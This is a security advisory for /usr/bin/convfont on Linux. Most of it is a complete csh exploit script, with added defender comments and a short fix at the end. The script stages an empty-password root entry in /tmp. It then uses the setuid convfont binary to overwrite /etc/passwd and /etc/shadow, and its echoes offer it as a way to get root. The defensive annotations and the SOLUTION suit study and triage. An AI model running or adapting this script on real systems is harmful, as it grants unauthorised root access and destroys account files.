COMMAND
/usr/bin/convfont
SYSTEMS AFFECTED
Linux
PROBLEM
The following is a shell script exploit for convfont, written by Squidge.
It gives the user who runs it root access.
#!/bin/csh
# Proof-of-concept published with the advisory for /usr/bin/convfont.
# What the visible code does: it stages replacement account files under /tmp,
# then runs convfont with /etc/passwd and /etc/shadow as the output path.
# The script itself says this depends on convfont being setuid root, so the
# underlying flaw is a privileged helper that writes to a caller-chosen path.
# Defender view: the fix is on the binary (remove the setuid bit). Artefacts
# that this script leaves behind are noted inline below.
echo "convfont exploit - by Squidge"
echo "squidge@onyx.infonexus.com"
echo " "
echo "this will get you root by exploiting a hole in /usr/bin/convfont"
#NOTE: If this auto-detect screws up, alter the variable PW_TYPE
# PW_TYPE = "plain" is for a normal /etc/passwd
# PW_TYPE = "shadow" is for a shadow /etc/passwd /etc/shadow combo
# Puts the current directory first in PATH. convfont is invoked by bare name
# further down and is therefore resolved through this PATH.
setenv PATH .:/bin:/usr/bin:/sbin:/usr/sbin
echo " "
echo "determining system type"
# The only detection performed is whether /etc/shadow exists.
if ( -e /etc/shadow ) then
# aha ! is a shadow system
echo "found a shadow password system. good job we're ueberhackers :)"
set PW_TYPE = shadow
else
echo "found a normal password system. make some effort, mr root !"
set PW_TYPE = plain
endif
set loop = 0
set limit = 100
# Stages a root entry with an empty password field under a fixed name in /tmp.
echo > /tmp/passwd root::0:0:Squidge is an Ueberhacker:/:/bin/sh
if ($PW_TYPE == "shadow" ) then
# Matching shadow entry, also with an empty password field.
echo > /tmp/shadow root::9566:0:99999:14:::
endif
echo "building passwd entry. please wait."
# Appends lines holding a single space to both staged files, bounded by limit.
# Presumably padding so the input is large enough for convfont to accept;
# the size convfont requires is not shown here.
# /tmp/shadow is appended to on plain systems as well, since the loop body
# does not test PW_TYPE.
while ( $loop < $limit ) @loop++
echo >> /tmp/passwd " "
echo >> /tmp/shadow " "
echo -n .
end
echo " "
echo "installing fake passwds"
echo "backing up /etc/passwd to /tmp"
# Copy of the original passwd file. The cleanup at the end does not remove it,
# so /tmp/real.passwd is a leftover worth checking for during triage.
cp /etc/passwd /tmp/real.passwd
if ( $PW_TYPE == "shadow" ) then
echo "unable to backup /etc/shadow tho, as it is mode 600"
endif
# The privileged write: convfont receives a staged input file and a system
# account file as its output path. The meaning of the 32 argument is not
# shown here. Both calls run regardless of PW_TYPE.
# Monitoring hint: unexpected content or mtime changes on /etc/passwd and
# /etc/shadow, in particular a root entry with an empty password field
# followed by near-empty lines.
convfont /tmp/passwd 32 /etc/passwd > /dev/null
convfont /tmp/shadow 32 /etc/shadow > /dev/null
# status reflects only the second convfont call above.
if ( $status != 0 ) then
echo "\!\!\! warning. Something dodgy occured. It could be:"
echo " convfont isn't installed"
echo " convfont isn't setuid root"
exit
endif
echo "now return to a login prompt, and type root. you don't need a password"
echo "be sensible, and remember: squidge - The Guild"
echo " *******************"
# Removes the two staged files only; /tmp/real.passwd stays on disk.
rm -f /tmp/passwd /tmp/shadow
SOLUTION
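Turn the setuid bit off on /usr/bin/convfont (for example, `chmod u-s /usr/bin/convfont`). On a system where the binary was setuid, also check that /etc/passwd and /etc/shadow have not already been overwritten.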